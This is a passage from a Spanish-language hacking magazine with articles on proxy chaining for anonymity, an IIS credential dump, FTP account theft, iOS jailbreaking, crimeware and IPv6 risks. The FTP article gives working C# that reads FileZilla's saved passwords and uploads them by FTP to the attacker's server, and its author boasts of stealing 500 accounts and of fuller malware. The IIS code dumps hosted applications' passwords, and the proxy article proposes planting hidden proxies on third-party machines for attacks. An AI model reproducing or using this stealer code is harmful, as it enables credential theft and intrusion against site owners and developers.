Velasco “AUN HAY MAS”, que quie-ro decir con esto, todavía podemos hacer mas anónima nuestra navega-ción, por medio de una técnica llamada “pROXYchAIN” con la cual nos co-nectaríamos a mas de 1 servidor Proxy, por ejemplo nuestra conexión verdadera esta en México pero nos conectamos a un Proxy que está en China y luego a uno en Afganistán y después a otro que está en Inglaterra y por último uno que este en Finlandia y aparte de esto todos los servidores son HIgh Anonymity, hehehe que creen que pase?, pues están en lo cierto seria una tarea descomunal y una gran cantidad de recursos se necesitarían para poder rastrear el origen

de la conexión, en el siguiente esquema planteo la conexión por medio de Proxy Chain Server´s:

En concreto lo que debe-mos hacer para utilizar un

servidor Proxy Web es primero conseguir un Proxy (número y

puerto). Podemos sacar uno de esta página: http://www.publicproxyser-vers.com/

Una vez que consigamos el Proxy y nos aseguremos que sea bueno, que significa cuando digo que sea bueno?, como podrán ver en la link que les di encontrarán algo como esto:(imagen)

IP. Es la IP con la que nos camuflajea-remos y la que verán todas las paginas que visitaremos, van entendiendo? ;PPuerto. Canal de comunicación por donde mandaremos y recibiremos la información.Type. Creo que es la más importante ya que siempre deberemos escoger los que tengan el tipo de “HIgh Anonymi-ty” ya que estos no guardan Logs de las computadoras que se conectan a ellos y así si nos quieren rastrear pues será súper pero súper difícil que nos localicen.

Una vez que escogimos un buen servidor Proxy tenemos

que decirle a nuestro equipo que se conecte a través de él, para eso

vamos a ir (usando FIREFOX) a He-rramientas > opciones > avanzado > red > Configurar como se conecta Firefox y después escribimos nuestro Proxy en las casillas de abajo (dirección por un lado y puerto por otro) y seleccionamos la casilla “usar el mismo proxy para todo” en el caso que vayas a usar el proxy para conectarte a un ftp o una conexión SSL

Bien con eso ya tenemos nuestro equipo configurado para navegar con un servidor Proxy y ocultos detrás de este, por lo tanto como quedo la co-

nexión la plasmaremos en el esquema siguiente: (imagen)

OK! Recuerden por favor que este es el más sencillo de los métodos y ten-dríamos que verificar si realmente está ocultando nuestra identidad, pero la técnica de verificación de identidad la dejaremos para el final del artículo.

IP Port Type Country Last Test

203.160.1.54 80 transparent Vietnam 2012-01-18

200.174.85.193 3128 transparent Brazil 2012-01-18

165.228.131.12 80 transparent Australia 2012-01-18

203.144.144.164 80 transparent Thailand 2012-01-18

62.65.159.183 3128 transparent Switzerland 2012-01-18

63.149.98.18 80 anonymity United States 2012-01-18

www.hackingmexico.mx18

navegación anónima

Page 21: Hacking Mexico

Como pueden ver este tipo de conexión necesita de más recursos,

y se asemeja mucho a lo que vemos en las películas de gangter´s infor-máticos donde tratan de rastrear al

delincuente informático y se dan cuenta que la conexión pasa por va-

rios países o cambio de localización, aquí lógicamente se las muestro en su forma real y sin tanto efecto es-

pecial de Hollywood pero realmente esta si es efectiva, el único problema

que le veo es que como se genera una conexión con varios servidores tendríamos que tener proxy rápidos

para poder llevar a cabo esta técnica, como les decía a mis alumnos de la certificación de hacking ético que doy, ---los delincuentes van

un paso delante de nosotros y un experto en seguridad informática

debe de pensar como ellos para así no quedarse atrás y poder aplicar

seguridad ofensiva en el momento oportuno, tomando en cuenta esto, yo lo que haría es instalar un proxy

server oculto en un cibercafé en una ciudad, otro en una universidad en

una ciudad diferente y así hacerlo en dos o tres lugares más donde se que la conexión es estable y rápida, con

eso garantizaría la conexión para atacar---.

Pero muchos se preguntaran a estas alturas con que utilería po-

dría hacer esto? Bueno pues muy fácil, existe una utilería llamada SocksChain que es un programa

que permite trabajar con cualquier servicio a través de una cadena de

Sockets o proxy server HTTP para ocultar la IP real, este puede traba-

jar con TELNET, IRC etc.

PRINCIPIOS DE OPERACIÓNDE SOCKSCHAIN SERVERSocksChain transmite la llamada TCP del programa cliente (Fire-fox) a través de una cadena de proxy servers, Sockschain solo se conecta el primer proxy server de la cadena y el primer proxy server a su vez manda la petición de conexión al segundo y así hasta llegar al final de la cadena confi-gurada, usando esta tipo de cone-xión donde el primero llamada al segundo y el segundo al tercero y el tercero al siguiente en la cadena, el rastreo de la conexión inicial es muy compleja, esto no quiere decir que sea imposible de rastrear ya que se podría seguir el orden inverso de la conexión analizando los logs de los servers conectados, pero surge una pregunta ¿si alguno de los servidores de la cadena no guardo los logs? Pues hasta ahí llego el rastreo ;), teóricamente este tipo de conexión provee un alto grado de anonimato, me atre-vería a decir que el grado de ano-nimato sería de un 70% y podría aumentar el % si lo combinamos con otras técnicas pero tengan en cuenta que el largo de la cadena es inversamente proporcional a la velocidad de conexión.

www.hackingmexico.mx 19

navegación anónima

Page 22: Hacking Mexico

CONFIGURACIÓNDEL SOCKSCHAIN

Ahora veremos un software que también tiene lo suyo, este sirve para hacer manualmente

un Proxychain, o sea un encadenamiento de varios Proxy`s

para así tener relativamente un buen anonimato en la red.

Como dice mi hijo “papa menos platica y

mas acción” hehehe, ok la versión que instalaremos será

SOCKSCHAIN v 3.11.151 mucha gente dice que este software ya no funciona y

realmente en el sentido estricto tienen razón ya que la lista de

Proxy`s servers que trae por default está obsoleta, pero

aquí no usaremos esa lista si no que vamos a crear nuestra propia lista de servidores que

obtendremos de la pagina mencionada en el apartado

CONFIGURACION DE UTILERIAS.

Primeramente instalaremos el sockschain como todo en

windows siguiente .. siguiente… hasta finalizar la instalación, un

vez ahí abrimos el programa y nos aparecerá la siguiente ventana:

En la cual podemos ver diferentes iconos, ahora damos clic en el icono que tiene como dos calcetines colgados y aparece la siguiente ventana la cual nos muestra una lista de servidores Proxy a los cuales nos podríamos conectar, una vez ahí le damos click en UPDATE LIST la cual bajara la nueva lista de servidores Proxy que están disponibles para su uso le damos clic y esperamos que actualice, una vez realizada, le damos clic en el botón llamado TEST ALL esto para que pruebe si los Proxy servers están disponibles para su uso y conectados.

www.hackingmexico.mx20

navegación anónima

Page 23: Hacking Mexico

ya no explicare esto aquí ya que en el apartado de configuración manual

ahí lo explico cómo hacerlo, solo diré que como Proxy Server deberán poner 127.0.0.1 por el puerto 1080 guardas los cambios y ahora si a probar la cone-xión arrancamos el explorador de Inter-net y verán como en el sockschain aparece el encadenamiento que se está haciendo en la siguiente ventana un ejemplo:

Con esto nos podemos dar cuenta que funciona perfectamente el encadenamiento, en próximas ediciones de la revista veremos las demás téc-nicas que faltan por analizar.

Saludos.

Una vez actualizada y testeados todos los Proxy ser-

vers aparecerá algo como en la siguiente ventana: (imagen)

Aquí como pueden ver ustedes apa-recen unos servidores con un foquito y otros con un icono circulo Rojo con una X blanca eso quiere decir que los segundos no están en funcionamiento entonces Tendremos que borrarlos se-leccionándolos y dando clic en el botón DELETE ya que están en la lista solo los que funcionaran, cerramos la ven-tana y ahora si a empezar la confi-gurar el sockschain.

Ahora configuremos nues-tra cadena de servidor Proxy a

los cuales nos conectáremos para ocultar Nuestra IP, para eso damos

clic en la ventana principal del progra-ma en el signo de + de color verde, don-de saldrá la siguiente ventana:

Una vez estando ahí en la ventana de creación de la candena, vamos a con-figurar primeramente en la opción llamada NAME le ponemos el nombre

con el cual identificaremos a nuestra cadena de conexión después vamos a la opción donde pondremos la cantidad de Proxy`s servers a los que nos conectáre-

mos en este caso haremos una conexión a TRES servidores.Punto seguido vamos ahora si a añadir las ip de los servidores a los cuales nos

conectaremos como se muestra en la imagen de arriba, ya seleccionados damos clic en el botón OK y listo programa configurado, ahora si viene la prueba de fuego de-beremos configurar nuestro explorador de Internet manualmente para que se conecte,

www.hackingmexico.mx 21

navegación anónima

Page 24: Hacking Mexico

MicrosoftHacking

www.hackingmexico.mx22

hacking microsoft c#

Page 25: Hacking Mexico

El código es tan sencillo como el siguiente

ServerManager man=new ServerManager(); Console.Clear(); foreach (var site in man.Sites) { foreach (var app in site.Applications.ToList()) { foreach (var directory in app.VirtualDirectories) { Console.WriteLine(“Sitio {0} App {1}

UserName:{2},Password:{3}”, site.Name, directory.Path,directory.UserName,directory.Password); } } } Console.ReadLine();

C#

En este articulo vamos a demostrar que con Microsoft también es po-sible realizar hacking utilizando código relativamente sencillo. El objetivo es obtener el usuario y

el password con el cual está corriendo y au-tenticándose una aplicación en el servidor web (IIS), tomaremos como talon de Aquiles para este servidor el actual esquema de negocio que

se maneja para hostear aplicaciones en servido-res compartidos.

La estrategia para alcanzar el objetivo es consultar todas las aplicaciones en el IIS, nave-gar atravez de sus aplicaciones y como es buena práctica en las aplicaciones web, las cadenas de conexión utilizan integrate security, que signifi-ca esto? Que utilizamos una cuenta de dominio para poder firmarnos en el servidor SQL, con lo

cual el password nunca aparecerá en el archivo de configuración.

La aplicación navegara atreves de todas las aplicaciones web y nos arrojara el nombre de usuario y la contraseña de todas las apli-caciones hosteadas en ese server y con esto tendremos acceso tanto a la base de datos como a cualquier cuenta que tengan privilegios.

Debug en el IdeSalida Consola

po

r M

ar

io A

lber

to G

on

za

les a

ka

Ax

xu

sMicrosoftwww.hackingmexico.mx 23

hacking microsoft c#

Page 26: Hacking Mexico

Hack intoshS aludos amigos mios, soy

M4ku4Z^^ y es un placer formar parte de este proyec-to tan interesante al cual fui

aceptado por el buen Megabyte, algunos ya me conocen otros no tanto , espero poder contribuir con este proyecto y al igual si tienen dudas ya saben como contactarme .

Vamos a analizar el jailbreak a disposi-tivos iOS de Apple , revisar por que si o por que no debemos hacer el jailbreak, también averiguaremos si nuestros dispositivos son candidatos o aptos para hacerlo.

Actualmente se pueden hacer jail-break a los siguientes dispositivos de Apple como los con :

-Ipod touch de 1 generación-Ipod touch de 2 generación-Ipod touch de 3 generación-Ipod touch de 4generacion-Iphone classic (1 generación)-Iphone de3 Generación-Iphone de 4 Generación-Ipad de 1 generación-Apple tv de 2 generación.

Tomado de WikipediaJailbreak: (en español, escaparse de la cárcel o, más literalmente, rompecárcel), un proceso que permite a los usuarios de los dispositivos iPhone, iPod Touch, iPad y Apple TV de todas las generaciones eje-cutar aplicaciones distintas a las alojadas en App Store, el sitio oficial de descarga de programas para estos dispositivos.

En mis palabras, seria como sacar todo el provecho máximo de los disposi-tivos que Apple nos vende.

Hasta la Fecha he logrado hacer jail-break a ipods touchs, iphones, ipads y Apple tv 2G.

No es ilegal hacer el jailbreak a nin-gún dispositivo , pero lo que es ilegal es instalar aplicaciones de la APP STO-RE crackeadas, eso lo conseguimos con “APPSYNC” (pronto veremos su funcio-namiento).

He de comentarles que el proceso de jailbreak es diferente según el IOS (ver-sión de software instalado en el idevice) .El firmware mas acual es el IOS 5.1 , yo aun no lo he instalado en ninguno de mis dispositivos , pero mas adelante, en el siguiente tutorial haremos una pequeña reseña de que es lo nuevo en ese IOS.

Al Hacer Jailbreak al dispositivo obte-nemos bastantes mejoras en el desempeño

del idevice , un ejemplo y el mas aclamado lo vemos en el iphone de cualquier gene-ración la cual es la liberación

del carrier o de las bandas , esto nos quiere decir que podemos usar el iphone con la operadora que mas nos convenga , ya sea por precio , cobertura , por preferencia , o simplemente por decidir tener el iphone li-bre . Aquí hay dos cosas muy importantes: Al hacer jailbreak, no significa que tendre-mos liberado el teléfono, eso es otro proce-so que veremos mucho mas adelante.

jailbreak en d ispositivos IOS

Definición de Jailbreak

www.hackingmexico.mx24

hackintosh

Page 27: Hacking Mexico

ALGUNOS BENEFICIOS DE UN DISPOSITIVO IOS CON Y SIN JAILBREAKAl Hacer el jailbreak obtendremos beneficios que no podemos tener con un dispositivo por llamarlo de alguna manera “normal”.

A continuación detallare los beneficios que su servidor ha usado en sus dispositivos:

Como pueden ver amigos los be-neficios son bastantes buenos , pero la lista no termina ahí, son demasiados los que podemos obtener, los cuales iremos aprendiendo a instalar y usar .

CARACTERÍSTICAS PARA OBTENER BENEFICIOS DEL JAILBREAK¿Como instalo dicho software para tener esos beneficios?

La respuesta es muy simple, tenemos que realizar el jailbreak al sistema IOS del dispositivo.

¿Mi dispositivo de Apple es apto para Tener jailbreak?

Si pero debe cumplir ciertos requi-sitos, antes de hacer un jailbreak es im-portante leer y saber que vamos a hacer exactamente.

Para poder hacer jailbreak a nuestro dispositivo es importante sabe que no hay un jailbreak en general para todos los productos Apple , esto varia según :

-Generación del Dispositivo-Versión de Firmware-Modelo del dispositivo.¿Mi dispositivo pierde garantía frente

a APPLE si le hago jailbreak?La respuesta es NO , por que? , por

que no modificamos el hardware , pero si modificamos el software, un ejemplo muy claro seria , supongamos que mi IPHONE tiene jailbreak y esta liberado, trabaja bien en pocas palabras , pero….. falla la red 3G y tengo contratado un plan de datos con la operadora X, como le hago para llevarlo a la empresa X y que me hagan valida la garantía (obvio tuve que haber descartado previamente , ajustes de servicios 3G o que alguna apli-cación interfiera con la conexión del telé-fono hacia la operadora) , Si bien se sabe si llevas un dispositivo a que te valide la garantía y tiene jailbreak la garantía se anula , pero si restauramos un firmware limpio se borra todo y procedemos a re-clamar la garantía.

Hack intoshPor Juan Angel Osorio M4ku4zM4ku4Z^^[email protected]

Al hacer jailbreak, no significa que

tendremos liberado el

teléfono, eso es otro

proceso que veremos

mucho mas adelante.

DESPÉDIDABueno amigos , hemos llegado a la recta final de esta sección , donde aprendimos a co-nocer todo el potencial que podríamos tener si hacemos jailbreak a nuestros dispositivos , además de conocer algunas preguntas que se hacen muchos cuando van empezando en esto del jailbreak . Por mi parte es todo , sin antes agradecer su atención y nos vemos pronto en otro capitulo más.

jailbreak en d ispositivos IOS

www.hackingmexico.mx 25

hackintosh

Page 28: Hacking Mexico

Robo de cuentas

Hola mi nickname es Corrup-tedByte y en esta ocasión abordaremos el tema de la

cuentas FTP y las vulnerabilidades con las que cuenta FileZilla el cliente FTP más usado por muchas razones, además les dejare el código fuente de un pequeño script que desarrolle en C# .NET para el robo de cuentas FTP del cliente FileZilla.

¿Qué es FTP?FTP o como en ingles se dice File Trans-fer Protocol, ‘Protocolo de Transferencia de Archivos’ es un protocolo de red para la transferencia de archivos entre siste-mas conectados a una red basado en la arquitectura cliente-servidor. Es muy sencillo de entender, del lado del cliente (Tu, tu computadora) manda una peti-

ción al servidor para descargar o enviar un fichero y el servidor responde con ese fichero, a grandes rasgos eso es lo que es FTP aunque cuenta con un proceso más complejo, pero eso lo pueden estudiar más a fondo en nuestro señor Wikipedia, o lo pueden Googlear. Este protocolo se utiliza por lo regular para entrar a un servidor web y subir páginas web, por lo cual teniendo la cuenta FTP de la página de peña nieto por ejemplo, pues entras, le borras la pagina y subes una tuya nomas para darle en la madre.|

Robo decuentas FTPHay muchas maneras de robar cuen-tas FTP como infección por troyanos,

keyloggers, sniffing, penetración me-diante vulnerabilidades de tu sistema operativo ya sea con Metasploit o a mano e incluso XSS, entre otras, pero aquí para que no anden de juackers adi-vinando contraseñas, o haciendo fuerza bruta como el megabyte (just kidding), les voy a mostrar las vulnerabilidades con las que cuenta el cliente FTP Fi-lezilla que es el más utilizado por los desarrolladores web y como explotar esas vulnerabilidades programando un script, el día que libere el script con di-ferentes métodos de spreading obtuve 500 cuentas FTP en un solo día ya que muchos freelancers usan este cliente para administrar las diferentes páginas web de sus clientes, entonces una sola persona puede tener hasta 30 cuentas FTP guardadas de sus clientes.

www.hackingmexico.mx26

robo de cuentas FTP

Page 29: Hacking Mexico

Vulnerabilidadesen FileZillaAl principio mencione acerca de que FileZilla tiene vulnerabilidades, son 2 vulnerabilidades que mas que vulnerabilidades de programa-ción son vulnerabilidades de logística la pri-mera es el guardado automático de las cuen-tas FTP, si tú te entras a un servidor con FTP con FileZilla el automáticamente las guarda en su registro, ni si quiera te pregunta es una opción marcada por defecto, la segunda y más importante así como estúpida es la mane-ra en que almacena sus contraseñas, FileZilla no almacena las contraseñas como lo hace el MSN u otros programas que con las mismas dlls del sistema encriptan las cuentas, FileZi-lla las almacena en un XML en texto plano en el siguiente formato:

Robo de cuentas

FTP<?xml version=”1.0” encoding=”UTF-8” standalone=”yes” ?><FileZilla3> <RecentServers> <Server> <Host>CorruptedByte.net</Host> <Port>21</Port> <Protocol>0</Protocol> <Type>0</Type> <User>CorruptedByte</User> <Pass>MiContra</Pass> <Logontype>1</Logontype> <TimezoneOffset>0</TimezoneOffset> <PasvMode>MODE_DEFAULT</PasvMode> <MaximumMultipleConnections>0</MaximumMultipleConnections> <EncodingType>Auto</EncodingType> <BypassProxy>0</BypassProxy> </Server> </RecentServers></FileZilla3>

Como pueden ver esta guardado en texto plano sin ningún tipo de encriptación a simple vista puedes ver como tienes los sub nodos con las credenciales FTP (Host, Port, User, Pass), esto es una gran vulnerabilidad ya que como lo mencione es de los clientes FTP más usado por los desarrolladores web que manejan diferentes servidores, este archivo se encuentra en la siguiente ruta:

“C:\Users\CorruptedByte\AppData\Roaming\FileZilla\recentservers.xml”

www.hackingmexico.mx 27

robo de cuentas FTP

Page 30: Hacking Mexico

public void FileZillaAccounts(string sLogsPath) { XmlDocument xmlAccountsFile = new XmlDocument(); string sFilePath =Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).ToString() + “\\FileZilla\\recentservers.xml”; xmlAccountsFile.Load(sFilePath); xmlNodeList xmlRecentServers = xmlAccountsFile.GetElementsByTagName(“RecentServers”); xmlNodeList xmlList = ((XmlElement)xmlRecentServers[0]).GetElementsByTagName(“Server”);string sAccount;foreach (XmlElement nodo in xmlList) { XmlNodeList xmlHost = nodo.GetElementsByTagName(“Host”); XmlNodeList xmlPort = nodo.GetElementsByTagName(“Port”); XmlNodeList xmlUser = nodo.GetElementsByTagName(“User”); XmlNodeList xmlPass = nodo.GetElementsByTagName(“Pass”); sAccount = string.Format(“Host: {0} Port: {1} User: {2} Pass: {3}”, xmlHost[0].InnerText, xmlPort[0].InnerText, xmlUser[0].InnerText, xmlPass[0].InnerText); FileStream fsLogs = new FileStream(sLogsPath, FileMode.OpenOrCreate, FileAccess.Write); fsLogs.Close(); StreamWriter swAccount = File.AppendText(sLogsPath); swAccount.WriteLine(sAccount); swAccount.Close(); }}

Desarrollemosel scriptAhora les mostrare como programar un script para robar las cuentas FTP de Fi-leZilla, esto lo hare en C# por que es donde programe todo un malware para robo de básicamente cualquier tipo de cuentas.

Primero que nada lo que vamos a programar será un método para sacar las cuentas del FileZilla y guardárnoslas en un archivo de texto y esto se hace de la siguiente manera:

www.hackingmexico.mx28

robo de cuentas FTP

Page 31: Hacking Mexico

Es un método muy simple (claro para los que sabemos pro-gramar, si no sabes pues hay esta nuestro señor Google), a simple vista se ve que lo único que hace este método es crear un objeto XML para trabajar con el asi como se le da la ruta de manera automática con esta línea:

.NET nos facilita la ruta y así nos quitamos el problema que nos topamos con que el fichero XML este dentro de una carpeta den-tro de otra carpeta con el nombre de usuario de la maquina que obviamente desconocemos. Después se procesa todo el XML y se saca el valor de cada nodo que tiene las credenciales FTP, una vez haciendo esto solo se guarda en un archivo de texto, pero ob-viamente con esto nosotros no tendríamos las credenciales FTP solo se almacenarían en un archivo de texto de la víctima, para eso ahora programaremos un método para enviar las contraseñas por medio de FTP a nuestro servidor, de la siguiente manera:

Con este método nada mas le pasamos nuestras credenciales FTP para mandar el fichero con las contraseñas y ya en el mé-todo principal solo llamamos a los métodos que programa-mos anteriormente, la otra manera de hacerlo más simple es mandando directamente el fichero XML por FTP pero cuando lo programe estaba programando un sistema de facturación electrónica y estaba practicando con los objetos XML, a este código le falta mucho yo solo les di el método principal que es como extraer las contraseñas pero el malware completo que desarrolle tiene métodos de spreading, ofuscación, ejecución durante el arranque, entre otros así como métodos para el robo de cuentas guardadas en chrome, firefox, internet explorer, MSN y otros clientes FTP menos usados. Si el megabyte no se rockstarea cuando se haga popular la revista y me deja escribir para la revista, seguiré compartiendo muchos otros métodos para escritura de malware ya un poco más avanzados entre otras cosas interesantes.

Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).ToString() +“\\FileZilla\\recentservers.xml”;

public void Send(string sHost, string sDir, string sUser, string sPass, string sFile) { string ftpHostDirFile = “ftp://” + sHost +sDir +sFile; FtpWebRequest ftp = (FtpWebRequest)FtpWebRequest.Create(ftpHostDirFile); ftp.Credentials = new NetworkCredential(sUser, sPass); ftp.KeepAlive = true; ftp.UseBinary = true; ftp.Method = WebRequestMethods.Ftp.UploadFile; FileStream fs = File.OpenRead(sFile); byte[] buffer = new byte[fs.Length]; fs.Read(buffer, 0, buffer.Length); fs.Close(); Stream ftpstream = ftp.GetRequestStream(); ftpstream.Write(buffer, 0, buffer.Length); ftpstream.Close(); }

www.hackingmexico.mx 29

robo de cuentas FTP

Page 32: Hacking Mexico

Por: Arturo Zamora@zeux0r

[email protected]

mediante Robo

IdentidadCrimeware

de

robo de identidad mediante crimeware

www.hackingmexico.mx30

Page 33: Hacking Mexico

El robo de identidad mediante el crimeware, actualmente es uno de los nego-cios mas lucrativos para los delincuentes informáticos, en la actualidad obtienen

ganancias muy importantes, pero ¿Porqué es esto tan lucrativo? Bueno como sabemos para los delincuentes informáticos este tipo de actividades

requieren de una inversión mínima y máximas ganancias, estamos hablando de in-vertir y generar un 99.09 % de ganancias, y con un mínimo de esfuerzo.Así es el por

que el crimeware ha crecido demasiado en los últimos años.

¿Qué es el crimeware y como funciona?

Se le da el nombre de crimeware a aquel software diseñado para el robo de cuentas o robo de identidad del afectado, siendo usadas para obtener beneficios económicos alta-

mente redituantes, este nombre se le da a keyloggers, backdoors, trojanos, entre otros, la mayoría de este tipo se software es encontrado con el modo de una botnet, las funciones

de este tipo de software dañino son muchas, desde controlar nuestro ordenador, ver lo que estamos realizando, tener acceso a el de manera remota y oculta ya que esto le permite al

atacante obtener la información deseada y mantener el control sobre cada una de las perso-nas infectadas por dicho software “botnet” si es su caso.

Ingeniería social

Hay varias maneras de adquirir estos tipos de infecciones en la red, una de ellas es la ingeniería social.Por lo regular el atacante maneja la ingeniería social a su favor invitando a los “objetivos” a entrar a

ver un anuncio, ya sean videos, fotos, etc. Ya que las personas tenemos un defecto muy grande el cual se le llama curiosidad. Y por el simple

morbo de ver que sucede o que contiene ese correo aceptamos sin ni siquiera saber quien es el que envía el correo o si esta verificado y así podemos ser una victima, otra de ellas es mediante el traspaso

de archivos de personas extrañas que se hacen pasar por amigos para solamente robarte tu información como estas hay muchísimas otras que por curiosidad acepten el contenido y queden vulnerables a perder su información confidencial .

Ingeniería social

En el caso de las empresas el falló estaría en los empleados, que a veces por falta de capacitación cometen estos errores.

Un caso seria la dependencia de soporte técnico o de ayuda del personal de servicios informáti-cos y podría pasar esto:

Simulación de ingeniería socialinteractuando con la persona

Riiiiiiing riiiiiiiing (sonido telefonico)

Asistente ejecutiva: Bueno?

Chico malo: Que tal Amy buenas tardes soy de soporte técnico, oye mira me informaron que tu equipo esta demasiado lento y quiero corroborar a que se debe.

Asistente ejecutiva: Hay que bueno, si mira es que se me pone muylenta la máquina y no puedo trabajar bien.

Chico malo: Ok, mira tienes un icono de asistencia remota en tu escritorio, ábrelo y me podrías proporcionar tu usuario y contraseña para entrar a tu equipo así revisarlo

de manera remota?

Asistente ejecutiva: Claro que si, mi usuario es ***** y mi contraseña *******

Introducción

www.hackingmexico.mx 31

robo de identidad mediante crimeware

Page 34: Hacking Mexico

Simulación de ingeniería social interactuando con la persona.

Aquí el atacante estudio perfectamente su objetivo, sabía a que hora llamar y por parte de la asistente vemos que no pide ni siquiera un nombre, ni departamento,

podría haber llamado primero al superviso o simplemente no haber dado informa-ción sin antes revisar si hay un ticket abierto y que numero es. Así es como muchas

empresas pierden millones hoy en día ya que los usuarios están malcapacitados y no tienen información de los daños que este tipo de ataques pueden causar

Ataque silencioso

Crimeware no viene solo, por lo regular tiene también ayuda de otras vulnera-bilidades, estas vulnerabilidades se encargan de ayudar al software malicioso a

infectar a los equipos vulnerables.¿Porqué le doy el nombre de ataque silencioso?

Ya hace tiempo existen scripts llamados exploit packs que se encargan de ex-plotar varias vulnerabilidades en sistemas por lo regular estos se aprovechan de

la ejecución remota en navegadores u otros complementos como lo son Word, Excel, power point, java, reproductores de video y música. Este error

hace que el usuario al aceptar, entrar o abrir un sitio quede automáticamente in-fectado y sea una victima mas de este software. Con la ayuda de los exploit packs el software se encontrara incrustado en el código fuente del sitio como un frame

abriendo otro sitio o como un applet o ventana emergente tratando de hacer que lo veamos casi obligatoriamente

Alerta sistema Infectado

Cuando el sistema ha sido infectado, aparte de estar perdiendo información confidencial, también en algunos casos se perderían cantidades monetarias del usuario “victima” de

sus cuentas bancarias, tarjetas de crédito, pero eso no seria todo, si no también el usuario “victima” estaría perdiendo su identidad ya que el atacante puede usar sus recursos para

su beneficio y apoyando a la infección y distribución de este crimeware.

¿Porqué lo estaría apoyando?

Al hablar de estar apoyando a la distribución e infección del crimeware no se trata de que el usuario “victima” este de acuerdo con el atacante para esto, si no que

de manera inconsciente la victima puede introducir artículos de almacenamiento masivo y llevarlo a otros equipos de infectándolos estos si no se encuentran pro-

tegidos automáticamente como nos muestra la imagen

www.hackingmexico.mx32

robo de identidad mediante crimeware

Page 35: Hacking Mexico

¿Porqué lo estaría apoyando?Los lugares mas comunes de infección son escuelas, parques, cibercafés o simple-

mente lugares públicos del cual mas de uno tenga acceso.

Recolección de información

La recolección de información por parte del atacante la hace mediante bases de datos o enviándola via correo electrónico.

Unos ejemplos de ello son Botnets, almacenamiento mediante base de datos via web. Tu identidad fue robada cuando has sido victima de robo de identidad

ya hay poco que puedas hacer, ya que tu nombre, domicilio entre otras cosas han sido comprometidos; también “a veces” se tuvieron perdidas económicas

en compras que no fueron autorizadas por la persona propietaria “real” de las cuentas o simplemente extrajeron el dinero sin autorización consiente del usuario.

Protección

Los métodos para protegernos son muchos , y también muchos softwares que nos ayudan a esto.

Lo que tendríamos mas en cuenta es controlar un poco mas la curiosidad, antes de abrir un correo ver si la persona en verdad es quien dice ser, si no te-

nemos ese nombre en nuestras listas no abrirlo, evitar abrir archivos adjuntos, no seguir links que nos lleven a otros sitios fuera del correo, no abrir los correos

de bandeja spam, si es que no los conocemos, y si los conocemos verificar que sea el que lo envía, mantener nuestro antivirus actualizado y verificar una ves

a la semana que nuestro sistema este libre de amenazas, tener un scanner de malware y que nos avise de sitios potencialmente peligrosos, verificar que no

tengamos procesos raros ejecutándose en nuestro sistema.Ya si tienes mas paranoia , verificar todas las conexiones que hacemos y a donde

las hacemos, ver nuestro archivo host en caso que estemos usando Windows, y …. Naa creo que esas son todas. ¿FIN?

robo de identidad mediante crimeware

www.hackingmexico.mx 33

Page 36: Hacking Mexico

340.282.366.920.938.463.463.374.607.431.768.211.456

riesgosde

seguridadenIPv6

Msc. Helios [email protected]

riesgos de seguridad en IPV6

www.hackingmexico.mx34

Page 37: Hacking Mexico

El corazón del funcionamiento básico de internet radica en el Protocolo de Inter-net mejor conocido como protocolo IP, actualmente en uso en su versión 4 desde 1977 cuya capacidad de direccionamien-to de 32 bits fue prevista desde 1995 que se agotaría en algún mediano plazo, lo cual oficialmente se reconoció ocurrió en 2011, quedando solo unas cuantas direc-ciones por repartir en los registros regio-nales con un estimado de disponibilidad sólo para unos pocos años más.

Desde que se visualizó este escenario de incapacidad de soportar un crecimiento sostenido del acceso de nuevos usuarios y dispositivos al internet, se trabajó en la creación de una siguiente versión del pro-

tocolo IP el cuál estubo preparado para finales de los noventas, teniendo casi 10 años de implementación y pruebas, siendo a partir del año 2005 cuando se impulsa de manera generalizada una ex-hortación global a iniciar la transición al nuevo protocolo denominado Protocolo de Internet versión 6 IPv6.

En diversas partes del mundo se han to-mado variados esfuerzos para facilitar o acelerar la transición al nuevo protocolo pero sin embargo, se espera que al me-nos durante un periodo de 10 a 15 años se viva una experiencia bastante dispar en distintas regiones y distintos tipos de usuarios para adoptar o diseñar nuevas tecnologías compatibles con el nuevo protocolo, lo cual crea un escenario de seguridad peculiar para muchos debido a la varianza de preparativos adecuados y por el retraso en la implementación en comparación con la disponilidad y acceso a la nueva tecnología que ya se encuentra presente en diversos rubros de internet.La transición al protocolo IPv6 se consi-

dera imperativa para todos, sin embargo muchos implementadores de tecnología y usuarios se encuentran con muy variantes grados de avance o retraso en los prepa-rativos, creando una situación de riesgos de seguridad que no se ha visto desde que internet cambió del protocolo NCP a TCP/IP hace varias generaciones.

Casi todos los nuevos productos tecnológi-cos en hardware y software con conectivi-dad a internet vienen preparados de fábrica para usar el protocolo IPv6, y muchos de ellos vienen con el protocolo habilitado aún cuando no haya una conectividad completa por parte del ISP, o en caso del que el ISP ya ofrezca el servicio, que adicionalmente a la conectividad IPv4, se tengan dispositivos y servicios conectados por IPv6 sin que el usuario se de cuenta.

ANTECEDENTES

Disponibilidad inesperadade IPv6

riesgos de seguridad en IPV6

www.hackingmexico.mx 35

Page 38: Hacking Mexico

Esto obliga que los planes y políticas de seguridad sean revisadas con prontitud para contemplar los riesgos de ya con-tar con la presencia del protocolo IPv6 y establecer mecanismos de seguridad adecuados para que lo regulen o en su defecto asegurarse de anular por el mo-mento su presencia para reducir riesgos como los siguientes que mencionaremos.

IPv6 funciona de una manera distinta a IPv4, de forma que deben de tratarse como dos elementos aparte aunque se encuentren presentes en un mismo sistema, lo cual se espera que sea la situación predominante durante el periodo de transición hasta que la necesidad de contar aún con servicios a través de IPv4 sea abandonada.

Los mecanismos de protección que se basen en alguna forma de control o refe-rencia por direccionamiento IPv4 no ten-drán una funcionalidad idéntica si se rea-lizan comunicaciones por IPv6, siendo el ejemplo más evidente el de los firewalls por ejemplo en un sistema unix/linux, donde IPtables funciona por separado de su contraparte IP6tables.

El origen o destino de una comunicación que se requiere sea regulada no será igual si se realiza por IPv6, aún cuando los ser-vicios en capas superiores de OSI sean por protocolos conocidos, se podrían evi-tar los mecanismos de protección simple-mente con buscar el acceso a traves de una dirección IPv6.

Si bien no será lo indicado suprimir el protocolo IPv6 de un sistema, los ad-ministradores tienen que aprender a considerar duplicar los mecanismos de protección para que se apliquen con la misma efectividad a todo lo que venga sobre IPv6.

Todo sistema y servicio que funcione con IPv6 se debe de considerar que se encuentra con acceso directo y público a internet, de manera que se requiere ase-gurarse que se cuenta con firewall de red o al menos con un firewall personal en cada sistema.

